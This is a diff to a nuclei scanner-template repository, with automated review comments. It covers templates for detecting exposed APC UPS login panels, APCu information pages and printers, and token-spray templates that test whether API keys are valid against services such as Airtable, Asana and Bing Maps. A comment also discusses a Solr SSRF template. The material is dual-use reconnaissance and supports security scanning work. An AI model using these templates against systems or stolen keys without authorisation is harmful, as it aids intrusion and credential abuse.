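Review bot: The new file `apachesolrlfissrf.yaml` carries `id: CVE-2021-27905`, which matches neither its filename nor the repository's convention of keeping CVE-identified templates under `nuclei-templates/CVE-<year>/`; nuclei keys its output on the template id and warns on duplicate ids, so if a `CVE-2021-27905.yaml` already exists in the CVE tree (likely, given the `CVE-20xx/` directories in this patch) the two will collide. Either move the file to its id under the CVE tree or give it a distinct descriptive id such as `apache-solr-replication-ssrf`. The matcher also only checks `<str name="status">OK</str>`, which confirms that the `fetchindex` command was accepted rather than that an outbound request to `https://example.com` was made, so if a fixed release still answers OK for a rejected URL this will produce false positives — verify against an 8.8.2 instance before relying on it. The template additionally lacks the `metadata: max-request: 2` added to other templates in this commit.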
@@ -1,22 +0,0 @@ -id: apcu-service - -info: - name: APCu service information leakage - author: koti2 - severity: low - tags: config,service,apcu - -requests: - - method: GET - path: - - "{{BaseURL}}/apc/apc.php" - - "{{BaseURL}}/apc.php" - - stop-at-first-match: true - matchers: - - type: word - words: - - "APCu Version Information" - - "General Cache Information" - - "Detailed Memory Usage and Fragmentation" - condition: or diff --git a/nuclei-templates/Other/apc-ups-login-381.yaml b/nuclei-templates/Other/apc-ups-login-381.yaml new file mode 100644 index 0000000000..46722d9e73 --- /dev/null +++ b/nuclei-templates/Other/apc-ups-login-381.yaml @@ -0,0 +1,25 @@ +id: apc-ups-login + +info: + name: APC UPS Login + author: droberson + severity: info + reference: + - https://www.shodan.io/search?query=title%3A%22APC+%7C+Log+On%22 + tags: iot,panel + +requests: + - method: GET + path: + - "{{BaseURL}}/logon.htm" + + matchers-condition: and + matchers: + - type: word + words: + - '<title>APC | Log On' + part: body + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/apc-ups-login-382.yaml b/nuclei-templates/Other/apc-ups-login-382.yaml deleted file mode 100644 index f28e384f2c..0000000000 --- a/nuclei-templates/Other/apc-ups-login-382.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: apc-ups-login - -info: - name: APC UPS Login - author: droberson - severity: info - reference: https://www.shodan.io/search?query=title%3A%22APC+%7C+Log+On%22 - tags: iot,panel - -requests: - - method: GET - path: - - "{{BaseURL}}/logon.htm" - - matchers-condition: and - matchers: - - type: word - words: - - 'APC | Log On' - part: body - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/apc_info.yaml b/nuclei-templates/Other/apc_info.yaml new file mode 100644 index 0000000000..cd1534ba4c --- /dev/null +++ b/nuclei-templates/Other/apc_info.yaml 
@@ -0,0 +1,19 @@ +id: apcu-service + +info: + name: APCu service information leakage + author: koti2 + severity: low + +requests: + - method: GET + path: + - "{{BaseURL}}/apc/apc.php" + - "{{BaseURL}}/apc.php" + matchers: + - type: word + words: + - "APCu Version Information" + - "General Cache Information" + - "Detailed Memory Usage and Fragmentation" + condition: or diff --git a/nuclei-templates/Other/apdisk-disclosure.yaml b/nuclei-templates/Other/apdisk-disclosure.yaml index 3d412ce36c..3d6c933681 100644 --- a/nuclei-templates/Other/apdisk-disclosure.yaml +++ b/nuclei-templates/Other/apdisk-disclosure.yaml @@ -4,6 +4,7 @@ info: name: Apdisk - File Disclosure author: DhiyaneshDk severity: low + description: Apdisk internal file is exposed. reference: - https://discussions.apple.com/thread/250354761 metadata: @@ -31,5 +32,4 @@ http: part: header words: - "text/xml" - -# digest: 4a0a0047304502203c433e233f175fbb028579eea7f7c6a6e2ebb21d40a15da47b79fb051f704422022100c044da0afa9f1168132de6724299268525aaa4878271b95169b07a3fb5c8d59e:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100e4a95dba16af6f8a6af5cd619c33f3f4ec5e1bf41b53fccab5a9844d71e54546022013b09064dcb5475915172199a571f7ac0ccb5c707ef1d1eca5513fdf5bd7d31c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/apeosport-v_c3375.yaml b/nuclei-templates/Other/apeosport-v_c3375.yaml new file mode 100644 index 0000000000..f1158ac5aa --- /dev/null +++ b/nuclei-templates/Other/apeosport-v_c3375.yaml @@ -0,0 +1,21 @@ +id: apeosport-v_c3375 +info: + name: apeosport-v_c3375 + author: cn-kali-team + tags: detect,tech,apeosport-v_c3375 + severity: info + metadata: + fofa-query: + - '"prop.htm" && "docucentre"' + product: apeosport-v_c3375 + vendor: fujixerox + verified: true +http: +- method: GET + path: + - '{{BaseURL}}/' + matchers: + - type: word + words: + - docucentre + - prop.htm 
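Review bot: The new `apc_info.yaml` drops the `tags: config,service,apcu` line and the `stop-at-first-match: true` setting that the `apc-info-379.yaml` it replaces (deleted earlier in this patch) carried, while keeping the same `id: apcu-service`; without tags the template cannot be selected or excluded with `-tags`, and without stop-at-first-match both paths are always requested. Restore `tags: config,service,apcu` under `info:` and `stop-at-first-match: true` under the request entry, and add `metadata: max-request: 2` as the other templates in this commit do. The id should also agree with the filename (`apc_info` versus `apcu-service`) so a finding can be traced back to the file.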
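Review bot: The matcher in the new `apeosport-v_c3375.yaml` lists `docucentre` and `prop.htm` without a `condition`, so the default `or` applies and any page that merely mentions `prop.htm` or `docucentre` is reported as this printer model, whereas the `fofa-query` in the same file (`"prop.htm" && "docucentre"`) requires both. Add `condition: and` under `words:`, and consider pairing it with a `type: status` matcher for `200` under `matchers-condition: and`, as `apc-ups-login-381.yaml` in this patch does. The template is also missing `metadata: max-request: 1`.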
diff --git a/nuclei-templates/Other/Apereo-Cas-rce.yaml b/nuclei-templates/Other/apereo-cas-rce.yaml similarity index 100% rename from nuclei-templates/Other/Apereo-Cas-rce.yaml rename to nuclei-templates/Other/apereo-cas-rce.yaml diff --git a/nuclei-templates/Other/api-1forge.yaml b/nuclei-templates/Other/api-1forge.yaml index 8f61810207..f679578aaa 100644 --- a/nuclei-templates/Other/api-1forge.yaml +++ b/nuclei-templates/Other/api-1forge.yaml @@ -4,13 +4,17 @@ info: name: 1Forge API Test author: daffainfo severity: info + description: Forex currency market data reference: - https://1forge.com/api - - https://github.com/daffainfo/all-about-apikey/blob/main/Currency%20Exchange/1Forge.md + - https://github.com/daffainfo/all-about-apikey/tree/main/1forge + metadata: + max-request: 1 tags: token-spray,1forge self-contained: true -requests: + +http: - method: GET path: - "https://api.1forge.com/quota?api_key={{token}}" @@ -23,3 +27,5 @@ requests: - '"quota_limit":' - '"quota_remaining":' condition: and + +# digest: 490a0046304402206e75f7e411aaad09158fd836607dca69948f5b02f37e6cadcdb29530c1e8f62002207c8621d83853143346ae1a43f25a1c25dfa0320d70459315b2a95ae2b6b68eed:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-abstract-company-enrichment.yaml b/nuclei-templates/Other/api-abstract-company-enrichment.yaml index 4b84a4367e..051e56cba9 100644 --- a/nuclei-templates/Other/api-abstract-company-enrichment.yaml +++ b/nuclei-templates/Other/api-abstract-company-enrichment.yaml @@ -8,10 +8,13 @@ info: reference: - https://www.abstractapi.com/api/company-enrichment - https://github.com/daffainfo/all-about-apikey/tree/main/abstract-company-enrichment + metadata: + max-request: 1 tags: token-spray,abstractapi self-contained: true -requests: + +http: - method: GET path: - "https://companyenrichment.abstractapi.com/v1/?api_key={{token}}&domain=airbnb.com" 
@@ -24,3 +27,5 @@ requests: - '"domain":' - '"year_founded":' condition: and + +# digest: 490a0046304402201b8b696a2960ec01a0ceab0b1606223c37eedea80d0e2b8d0412a999227023f302205c8e2c51ff3f05b2b101b3b28b7f12aed9047ae1f3f310c02c2b1f9cdd124b30:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-abstract-email-validation.yaml b/nuclei-templates/Other/api-abstract-email-validation.yaml index 145e4a97de..3de502fd7b 100644 --- a/nuclei-templates/Other/api-abstract-email-validation.yaml +++ b/nuclei-templates/Other/api-abstract-email-validation.yaml @@ -8,10 +8,13 @@ info: reference: - https://www.abstractapi.com/api/email-verification-validation-api - https://github.com/daffainfo/all-about-apikey/tree/main/abstract-email-validation + metadata: + max-request: 1 tags: token-spray,abstractapi self-contained: true -requests: + +http: - method: GET path: - "https://emailvalidation.abstractapi.com/v1/?api_key={{token}}&email=johnsmith@gmail.com" @@ -24,3 +27,5 @@ requests: - '"autocorrect":' - '"is_valid_format":' condition: and + +# digest: 4b0a00483046022100f9238bdf7a8d3c47066e7c986b940477e934daa9e1fea3038b8b3cf662f0d53e022100c7403ea05d7d218a713a6da3acc35d1f29ada92dbd4b451988803e50ea0e14df:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-abstract-exchange-rates.yaml b/nuclei-templates/Other/api-abstract-exchange-rates.yaml index 4a0f81a277..1dc879c9d8 100644 --- a/nuclei-templates/Other/api-abstract-exchange-rates.yaml +++ b/nuclei-templates/Other/api-abstract-exchange-rates.yaml @@ -8,10 +8,13 @@ info: reference: - https://www.abstractapi.com/api/exchange-rate-api - https://github.com/daffainfo/all-about-apikey/tree/main/abstract-exchange-rates + metadata: + max-request: 1 tags: token-spray,abstractapi self-contained: true -requests: + +http: - method: GET path: - "https://exchange-rates.abstractapi.com/v1/live/?api_key={{token}}&base=USD" 
@@ -24,3 +27,5 @@ requests: - '"last_updated":' - '"exchange_rate":' condition: and + +# digest: 490a0046304402201ce9c7e456983fff96fe77945768ed8bc846a5dd6e24464cea00dd45ab71c5db02203785bd67fa3224bf0be21b162f8deb8ed8c2226bb70ec8a79dd74f5e24dada4f:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-abstract-iban-validation.yaml b/nuclei-templates/Other/api-abstract-iban-validation.yaml index b605fcc7d4..b0f02b0e78 100644 --- a/nuclei-templates/Other/api-abstract-iban-validation.yaml +++ b/nuclei-templates/Other/api-abstract-iban-validation.yaml @@ -8,10 +8,13 @@ info: reference: - https://www.abstractapi.com/api/iban-validation - https://github.com/daffainfo/all-about-apikey/tree/main/abstract-iban-validation + metadata: + max-request: 1 tags: token-spray,abstractapi self-contained: true -requests: + +http: - method: GET path: - "https://ibanvalidation.abstractapi.com/v1/?api_key={{token}}&iban=BE71096123456769" @@ -23,3 +26,5 @@ requests: - '"iban":' - '"is_valid":' condition: and + +# digest: 490a00463044022028824c8b52ccf841d69daffc23f19103050a26b873e48defc9c35ee308338d330220172c39ddcdb8053f54f534bb2ea2fe00c5d0b18b3457748cbc18d2522f3e555b:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-abstract-image-processing.yaml b/nuclei-templates/Other/api-abstract-image-processing.yaml index ee0815c59a..a42f30e1b3 100644 --- a/nuclei-templates/Other/api-abstract-image-processing.yaml +++ b/nuclei-templates/Other/api-abstract-image-processing.yaml @@ -8,10 +8,13 @@ info: reference: - https://www.abstractapi.com/api/image-processing-optimization-api - https://github.com/daffainfo/all-about-apikey/tree/main/abstract-image-processing + metadata: + max-request: 1 tags: token-spray,abstractapi self-contained: true -requests: + +http: - raw: - | POST https://images.abstractapi.com/v1/url/ HTTP/1.1 
@@ -29,3 +32,5 @@ requests: - '"original_height":' - '"original_width":' condition: and + +# digest: 4a0a00473045022100bce21626b0148733684cdc0d6c67014c141c37ec66367e204b75af99cd447d3302203470f8e31c59957cc63f31a45fd786871ba62cd71fb5a9eb33c046ba6f2fbc9f:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-abstract-ip-geolocation.yaml b/nuclei-templates/Other/api-abstract-ip-geolocation.yaml index 63227eb94e..6427139d9f 100644 --- a/nuclei-templates/Other/api-abstract-ip-geolocation.yaml +++ b/nuclei-templates/Other/api-abstract-ip-geolocation.yaml @@ -8,10 +8,13 @@ info: reference: - https://www.abstractapi.com/api/ip-geolocation-api - https://github.com/daffainfo/all-about-apikey/tree/main/abstract-ip-geolocation + metadata: + max-request: 1 tags: token-spray,abstractapi self-contained: true -requests: + +http: - method: GET path: - "https://ipgeolocation.abstractapi.com/v1/?api_key={{token}}&ip_address=92.184.105.98" @@ -24,3 +27,5 @@ requests: - '"city":' - '"city_geoname_id":' condition: and + +# digest: 4a0a0047304502210093c0c54eb701f62ed392cdf7bce0b061812ff0e962b3e49e475ff233d337855c0220426668d40d558b35cc59b3675ea073d052474a39bc2907b28593e011431d2a81:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-abstract-phone-validation.yaml b/nuclei-templates/Other/api-abstract-phone-validation.yaml index 25f3807509..5773f0b5f2 100644 --- a/nuclei-templates/Other/api-abstract-phone-validation.yaml +++ b/nuclei-templates/Other/api-abstract-phone-validation.yaml @@ -8,10 +8,13 @@ info: reference: - https://www.abstractapi.com/api/phone-validation-api - https://github.com/daffainfo/all-about-apikey/tree/main/abstract-phone-validation + metadata: + max-request: 1 tags: token-spray,abstractapi self-contained: true -requests: + +http: - method: GET path: - "https://phonevalidation.abstractapi.com/v1/?api_key={{token}}&number=14154582468" 
@@ -24,3 +27,5 @@ requests: - '"is_valid_number":' - '"local_format":' condition: and + +# digest: 4a0a00473045022100d8ce8053c54d7ef1d316ce23f672a6af9ec81b27c19f6bd811b2814339c27656022054ec975a8b0dc1b373400c7d287fc7d0e89823f8e55c678ae68cd19f02ff1543:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-abstract-public-holidays.yaml b/nuclei-templates/Other/api-abstract-public-holidays.yaml index 52102f98ea..491daac1b6 100644 --- a/nuclei-templates/Other/api-abstract-public-holidays.yaml +++ b/nuclei-templates/Other/api-abstract-public-holidays.yaml @@ -8,10 +8,13 @@ info: reference: - https://www.abstractapi.com/api/holidays-api - https://github.com/daffainfo/all-about-apikey/tree/main/abstract-public-holidays + metadata: + max-request: 1 tags: token-spray,abstractapi self-contained: true -requests: + +http: - method: GET path: - "https://holidays.abstractapi.com/v1/?api_key={{token}}&country=GB&year=2021&month=1&day=25" @@ -24,3 +27,5 @@ requests: - '"location":' - '"date_year":' condition: and + +# digest: 4b0a00483046022100ea5b0aa189cd62224c43a68e2eabd42550c8043792570b97abc4af209c8987ca022100b28e1f8335e5be248692138bdd9976809da4ec8f7283d5c088ad719791f1f0f6:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-abstract-timezone.yaml b/nuclei-templates/Other/api-abstract-timezone.yaml index e3baf9d1f1..384a781ac4 100644 --- a/nuclei-templates/Other/api-abstract-timezone.yaml +++ b/nuclei-templates/Other/api-abstract-timezone.yaml @@ -8,10 +8,13 @@ info: reference: - https://www.abstractapi.com/api/time-date-timezone-api - https://github.com/daffainfo/all-about-apikey/tree/main/abstract-timezone + metadata: + max-request: 1 tags: token-spray,abstractapi self-contained: true -requests: + +http: - method: GET path: - "https://timezone.abstractapi.com/v1/current_time/?api_key={{token}}&location=Oxford,%20United%20Kingdom" 
@@ -24,3 +27,5 @@ requests: - '"longitude":' - '"latitude":' condition: and + +# digest: 4a0a004730450220404fa80dd4ee2544eb2c809d7b5defa8ec9c1f60c6ef99c88a620bf8cc8d2e82022100a03fbfdaa510280c8b14069a6deefa4ca22c35db4007a3750b98c0ceaa034cc1:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-abstract-user-avatars.yaml b/nuclei-templates/Other/api-abstract-user-avatars.yaml index 55c54f4042..a171ab492b 100644 --- a/nuclei-templates/Other/api-abstract-user-avatars.yaml +++ b/nuclei-templates/Other/api-abstract-user-avatars.yaml @@ -8,10 +8,13 @@ info: reference: - https://www.abstractapi.com/api/user-avatar-api - https://github.com/daffainfo/all-about-apikey/tree/main/abstract-user-avatars + metadata: + max-request: 1 tags: token-spray,abstractapi self-contained: true -requests: + +http: - method: GET path: - "https://avatars.abstractapi.com/v1/?api_key={{token}}&name=example" @@ -21,3 +24,5 @@ requests: part: header words: - 'image/png' + +# digest: 4b0a00483046022100a850948b132b01d73b020fcd8ec6753da6f6ebe5a230a480b37b9c82b66ee3d6022100a260133eb09434bb302d4210823f3738229d48948420031388d67a7d5aa3ed3a:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-abstract-vat-validation-rates.yaml b/nuclei-templates/Other/api-abstract-vat-validation-rates.yaml index 7f14dbe89d..625f9742db 100644 --- a/nuclei-templates/Other/api-abstract-vat-validation-rates.yaml +++ b/nuclei-templates/Other/api-abstract-vat-validation-rates.yaml @@ -8,10 +8,13 @@ info: reference: - https://www.abstractapi.com/api/vat-validation-rates-api - https://github.com/daffainfo/all-about-apikey/tree/main/abstract-vat-validation-rates + metadata: + max-request: 1 tags: token-spray,abstractapi self-contained: true -requests: + +http: - method: GET path: - "https://vat.abstractapi.com/v1/?api_key={{token}}&vat_number=SE556656688001" 
@@ -24,3 +27,5 @@ requests: - '"is_vat_valid":' - '"company_name":' condition: and + +# digest: 4a0a0047304502204ffd02a9e9ea07047be3f88fd5e53dddaf32935ef4476c4a46e53e998a21f1d1022100890deb736e6ae51d591f611e0007ddf73f31a947a33520b98d8218bcb2b43fe0:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-abstract-website-scraping.yaml b/nuclei-templates/Other/api-abstract-website-scraping.yaml index b0531d28a3..4dd68b5f5a 100644 --- a/nuclei-templates/Other/api-abstract-website-scraping.yaml +++ b/nuclei-templates/Other/api-abstract-website-scraping.yaml @@ -8,10 +8,13 @@ info: reference: - https://www.abstractapi.com/api/web-scraping-api - https://github.com/daffainfo/all-about-apikey/tree/main/abstract-website-scraping + metadata: + max-request: 1 tags: token-spray,abstractapi self-contained: true -requests: + +http: - method: GET path: - "https://scrape.abstractapi.com/v1/?api_key={{token}}&url=https://test.test" @@ -23,3 +26,5 @@ requests: - '"code":"validation_error"' - 'Reached error page' condition: and + +# digest: 490a00463044022009c985d563aad9ed09afb6b4b207d237534040eb35c6ba26a6cd7fad6525807f022013773c8d17adc1027bef5157fbcfe8ebfdeaa34ba83e37137db5f51dc6327dc4:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-abstract-website-screenshot.yaml b/nuclei-templates/Other/api-abstract-website-screenshot.yaml index 8c44c52c6f..0b11fd13c2 100644 --- a/nuclei-templates/Other/api-abstract-website-screenshot.yaml +++ b/nuclei-templates/Other/api-abstract-website-screenshot.yaml @@ -8,10 +8,13 @@ info: reference: - https://www.abstractapi.com/api/website-screenshot-api - https://github.com/daffainfo/all-about-apikey/tree/main/abstract-website-screenshot + metadata: + max-request: 1 tags: token-spray,abstractapi self-contained: true -requests: + +http: - method: GET path: - "https://screenshot.abstractapi.com/v1/?api_key={{token}}&url=https://test.test" 
@@ -22,4 +25,6 @@ requests: words: - '"code":"validation_error"' - 'Reached error page' - condition: and \ No newline at end of file + condition: and + +# digest: 4a0a00473045022100db8ffedc82ceed3165a9935d94b47b7fd1bdfd2a219d03a563a2bf6f82856a0002202e0a9484e954b9d78c96c9ef18a194e75134384a7306354d87f767486946e7e7:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-abstractapi.yaml b/nuclei-templates/Other/api-abstractapi-383.yaml similarity index 100% rename from nuclei-templates/Other/api-abstractapi.yaml rename to nuclei-templates/Other/api-abstractapi-383.yaml diff --git a/nuclei-templates/Other/api-adafruit-io-387.yaml b/nuclei-templates/Other/api-adafruit-io.yaml similarity index 100% rename from nuclei-templates/Other/api-adafruit-io-387.yaml rename to nuclei-templates/Other/api-adafruit-io.yaml diff --git a/nuclei-templates/Other/api-airtable.yaml b/nuclei-templates/Other/api-airtable.yaml index d076f34909..bfbf6e513e 100644 --- a/nuclei-templates/Other/api-airtable.yaml +++ b/nuclei-templates/Other/api-airtable.yaml @@ -8,10 +8,13 @@ info: reference: - https://airtable.com/api - https://github.com/daffainfo/all-about-apikey/tree/main/airtable + metadata: + max-request: 1 tags: token-spray,airtable self-contained: true -requests: + +http: - raw: - | GET https://api.airtable.com/v0/meta/bases HTTP/1.1 @@ -26,3 +29,5 @@ requests: - '"id"' - '"name"' condition: and + +# digest: 4a0a00473045022037017dfc3410f15453f95b4fbf4b9126ce14acf4f41502974ba693818b7c68f4022100d96c96c74aa56e3bb52af0f3823fc162ce9eb8709dd481726ca1b131e36dc7bc:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-alienvault-390.yaml b/nuclei-templates/Other/api-alienvault-390.yaml deleted file mode 100644 index d0e5ba33ae..0000000000 --- a/nuclei-templates/Other/api-alienvault-390.yaml +++ /dev/null 
@@ -1,26 +0,0 @@ -id: api-alienvault - -info: - name: AlienVault Open Threat Exchange (OTX) API Test - author: daffainfo - severity: info - reference: - - https://otx.alienvault.com/api - - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/AlienVault%20Open%20Threat%20Exchange.md - tags: token-spray,alienvault,exchange - -self-contained: true -requests: - - raw: - - | - GET https://otx.alienvault.com/api/v1/pulses/subscribed?page=1 HTTP/1.1 - Host: otx.alienvault.com - X-OTX-API-KEY: {{token}} - - matchers: - - type: word - part: body - words: - - '"$schema":' - - '"properties":' - condition: and diff --git a/nuclei-templates/Other/api-alienvault.yaml b/nuclei-templates/Other/api-alienvault.yaml new file mode 100644 index 0000000000..254c5be20d --- /dev/null +++ b/nuclei-templates/Other/api-alienvault.yaml @@ -0,0 +1,26 @@ +id: api-alienvault + +info: + name: AlienVault Open Threat Exchange (OTX) API Test + author: daffainfo + severity: info + reference: + - https://otx.alienvault.com/api + - https://github.com/daffainfo/all-about-apikey/blob/main/Anti%20Malware/AlienVault%20Open%20Threat%20Exchange.md + tags: token-spray,alienvault,exchange + +self-contained: true +requests: + - raw: + - | + GET https://otx.alienvault.com/api/v1/pulses/subscribed?page=1 HTTP/1.1 + Host: otx.alienvault.com + X-OTX-API-KEY: {{token}} + + matchers: + - type: word + part: body + words: + - '"$schema":' + - '"properties":' + condition: and diff --git a/nuclei-templates/Other/api-amdoren.yaml b/nuclei-templates/Other/api-amdoren.yaml index 340716effe..ff4d13cbcb 100644 --- a/nuclei-templates/Other/api-amdoren.yaml +++ b/nuclei-templates/Other/api-amdoren.yaml 
@@ -4,13 +4,17 @@ info: name: Amdoren API Test author: daffainfo severity: info + description: Free currency API with over 150 currencies reference: - https://www.amdoren.com/currency-api/ - - https://github.com/daffainfo/all-about-apikey/blob/main/Currency%20Exchange/Amdoren.md + - https://github.com/daffainfo/all-about-apikey/tree/main/amdoren + metadata: + max-request: 1 tags: token-spray,amdoren self-contained: true -requests: + +http: - method: GET path: - "https://www.amdoren.com/api/currency.php?api_key={{token}}&from=USD&to=EUR" @@ -22,3 +26,5 @@ requests: - '"error" : 0' - '"error_message" : "-"' condition: and + +# digest: 4a0a00473045022100bdf87830726285bcb4bb2fb3ae2964d072871eeff969ca898c65ebdfd702075802205c12a0dc34b647a423391b198a0ecb9dcbfd44262db51daf9742af924cf391a0:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-api2convert.yaml b/nuclei-templates/Other/api-api2convert.yaml index 64abcff5c5..2be77905f1 100644 --- a/nuclei-templates/Other/api-api2convert.yaml +++ b/nuclei-templates/Other/api-api2convert.yaml @@ -8,10 +8,13 @@ info: reference: - https://www.api2convert.com/docs/index.html - https://github.com/daffainfo/all-about-apikey/tree/main/api2convert + metadata: + max-request: 1 tags: token-spray,api2convert self-contained: true -requests: + +http: - raw: - | POST https://api.api2convert.com/v2/jobs HTTP/1.1 @@ -37,3 +40,5 @@ requests: - '"token"' - '"type"' condition: and + +# digest: 4b0a00483046022100ad6fcfc4c3f8ae88a73430167ac9af70a074277ed29ea41313921acc8f12aa62022100b84cc947d12787d907d869c110821565537722e25f4b5f083fd400bbd1d0ce3e:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-apiflash.yaml b/nuclei-templates/Other/api-apiflash.yaml index 60df0ee264..1a7ff58e22 100644 --- a/nuclei-templates/Other/api-apiflash.yaml +++ b/nuclei-templates/Other/api-apiflash.yaml 
@@ -8,10 +8,13 @@ info: reference: - https://apiflash.com/ - https://github.com/daffainfo/all-about-apikey/tree/main/apiflash + metadata: + max-request: 1 tags: token-spray,apiflash self-contained: true -requests: + +http: - method: GET path: - "https://api.apiflash.com/v1/urltoimage?access_key={{token}}&url=https://selfcontained.test" @@ -21,3 +24,5 @@ requests: part: body words: - 'net::ERR_NAME_NOT_RESOLVED at https://selfcontained.test' + +# digest: 4a0a00473045022100caa67506ea44b9839f21072292c6cffd95081230a7d165338ac04d8cb9e197dd02207c6b474673af8d85d63a3d1b8bf6fb0556b2881109b21aca2aa738a1488e4a03:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-asana-393.yaml b/nuclei-templates/Other/api-asana-393.yaml new file mode 100644 index 0000000000..6e3e815e2c --- /dev/null +++ b/nuclei-templates/Other/api-asana-393.yaml @@ -0,0 +1,18 @@ +id: api-asana +info: + name: Asana API Test + author: zzeitlin + reference: https://developers.asana.com/docs/using-terminal + severity: info + tags: token-spray,asana +requests: + - method: GET + path: + - "https://app.asana.com/api/1.0/users/me" + headers: + Authorization: Bearer {{token}} + matchers: + - type: status + status: + - 401 + negative: true diff --git a/nuclei-templates/Other/api-asana.yaml b/nuclei-templates/Other/api-asana.yaml deleted file mode 100644 index 9608f3c236..0000000000 --- a/nuclei-templates/Other/api-asana.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: api-asana - -info: - name: Asana API Test - author: zzeitlin - reference: https://developers.asana.com/docs/using-terminal - severity: info - tags: token-spray,asana - -self-contained: true -requests: - - method: GET - path: - - "https://app.asana.com/api/1.0/users/me" - headers: - Authorization: Bearer {{token}} - - matchers: - - type: word - part: body - words: - - 'data:' - - 'email' - - 'name' - condition: and 
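Review bot: The new `api-asana-393.yaml` replaces the positive body match (`data:`, `email`, `name` with `condition: and`, from the deleted `api-asana.yaml` at the end of this line) with a single negative `status` matcher on `401`, so any non-401 answer — 403, 429 rate limiting, 5xx, a captive portal — is reported as a valid token. It also drops `self-contained: true`, which the deleted version set and which the other token-spray templates in this commit keep; without it the template presumably needs a target URL to run even though the path is absolute — confirm against the nuclei version in use. Restoring the body matcher (or combining it with the negative status check under `matchers-condition: and`) and `self-contained: true` would bring it in line with its siblings; `api-bingmaps.yaml`, re-added a little further on, has the same `self-contained` omission, although there it was already absent from the version it replaces.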
diff --git a/nuclei-templates/Other/api-binaryedge.yaml b/nuclei-templates/Other/api-binaryedge.yaml index 43b39ba396..f19c46dfe8 100644 --- a/nuclei-templates/Other/api-binaryedge.yaml +++ b/nuclei-templates/Other/api-binaryedge.yaml @@ -9,16 +9,19 @@ info: reference: - https://binaryedge.io - https://docs.binaryedge.io - tags: dns,scan,recon,binaryedge,token-spray + metadata: + max-request: 1 + tags: recon,binaryedge,token-spray self-contained: true -requests: + +http: - method: GET path: - https://api.binaryedge.io/v2/user/subscription + headers: X-Key: "{{token}}" - matchers: - type: word part: body @@ -26,3 +29,5 @@ requests: - '"subscription"' - '"requests_left"' condition: and + +# digest: 4a0a00473045022100b8633708514218ce499d8e9dee966792e63396c036cba04c6fe7f9dff7b8f53902205a763ac3f2d63d5e3b45aeb8ff9e1d54b8ee79e334dcf14cbea504f74ef142bc:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-bingmaps-395.yaml b/nuclei-templates/Other/api-bingmaps-395.yaml deleted file mode 100644 index 0892d85b9f..0000000000 --- a/nuclei-templates/Other/api-bingmaps-395.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: api-bingmaps - -info: - name: Bing Maps API Test - author: zzeitlin - reference: https://docs.microsoft.com/en-us/bingmaps/rest-services/locations/find-a-location-by-address - severity: info - tags: token-spray,bing,maps,bingmaps - -requests: - - method: GET - path: - - "https://dev.virtualearth.net/REST/v1/Locations?CountryRegion=US&adminDistrict=WA&locality=Somewhere&postalCode=98001&addressLine=100%20Main%20St.&key={{token}}" - - matchers: - - type: word - part: body - words: - - 'ValidCredentials' diff --git a/nuclei-templates/Other/api-bingmaps.yaml b/nuclei-templates/Other/api-bingmaps.yaml new file mode 100644 index 0000000000..f9b7269bc9 --- /dev/null +++ b/nuclei-templates/Other/api-bingmaps.yaml 
@@ -0,0 +1,16 @@ +id: api-bingmaps +info: + name: Bing Maps API Test + author: zzeitlin + reference: https://docs.microsoft.com/en-us/bingmaps/rest-services/locations/find-a-location-by-address + severity: info + tags: token-spray,bing,maps,bingmaps +requests: + - method: GET + path: + - "https://dev.virtualearth.net/REST/v1/Locations?CountryRegion=US&adminDistrict=WA&locality=Somewhere&postalCode=98001&addressLine=100%20Main%20St.&key={{token}}" + matchers: + - type: word + part: body + words: + - 'ValidCredentials' diff --git a/nuclei-templates/Other/api-blitapp.yaml b/nuclei-templates/Other/api-blitapp.yaml index 29222cc6d2..87ffa67898 100644 --- a/nuclei-templates/Other/api-blitapp.yaml +++ b/nuclei-templates/Other/api-blitapp.yaml @@ -8,10 +8,13 @@ info: reference: - https://blitapp.com/api/ - https://github.com/daffainfo/all-about-apikey/tree/main/blitapp + metadata: + max-request: 1 tags: token-spray,blitapp self-contained: true -requests: + +http: - raw: - | GET https://blitapp.com/api/scheduledcapture HTTP/1.1 @@ -27,3 +30,5 @@ requests: - '"name"' - '"apps"' condition: and + +# digest: 490a00463044022038435a915b0077f4cca8d919f84aff4860fac82d7377272c33cfb4e6f8e6b6d702202b2fbfcbcc6b4bc1f414a11bcf7d2c6052fea60f5b0eeffcaa5804ce1a1a7010:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-block-400.yaml b/nuclei-templates/Other/api-block-400.yaml new file mode 100644 index 0000000000..2de9ea1703 --- /dev/null +++ b/nuclei-templates/Other/api-block-400.yaml 
